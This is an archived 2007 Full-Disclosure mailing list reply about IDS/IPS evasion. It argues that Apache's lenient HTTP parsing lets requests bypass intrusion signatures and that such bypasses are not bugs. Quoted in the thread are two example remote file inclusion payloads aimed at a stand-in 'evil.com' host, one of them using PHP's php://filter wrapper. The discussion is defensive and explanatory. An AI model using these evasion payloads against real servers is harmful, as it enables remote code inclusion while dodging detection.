lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 20 Jun 2007 17:50:55 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Jamie Riden" <jamie.riden@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: IPS Evasion with the Apache HTTP Server

Dear Jamie Riden,

--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A@...urity.nnov.ru:


JR> (This is what I gathered from the original posting, but I might be wrong.)

JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,

Original  BreakingPoint  articles  author  refers to says "The intent is
describe  the  strange  behaviors  of network applications". It mentions
neither  of  IPS  products, but IIS and Apache. And at least one case of
Apache  behavior  is  partially  expected  (because  of RFC) and already
described (by Michal Majchrowicz).

JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:

JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

IPS  may  detect  known attacks. Just like antivirus, you may use IPS to
protected  against known viruses/exploits. An ability to bypass IPS with
new one is not a bug. I do collect different content filtering bypassing
methods:

http://securityvulns.com/advisories/content.asp

You  simply  MUST  accept  the  risk  there  is always the way to bypass
content  filtering. IPS like doesn't protect your network by itself. IPS
is nothing, but a tool.

JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.

In  this  situation IDS/IPS should alert unsupported request attempt was
made and block this attempt in case of IPS.

JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )

I  can  write  buggy application and attempt to exploit it will never be
detected by existing signatures.

-- 
~/ZARAZA http://securityvulns.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ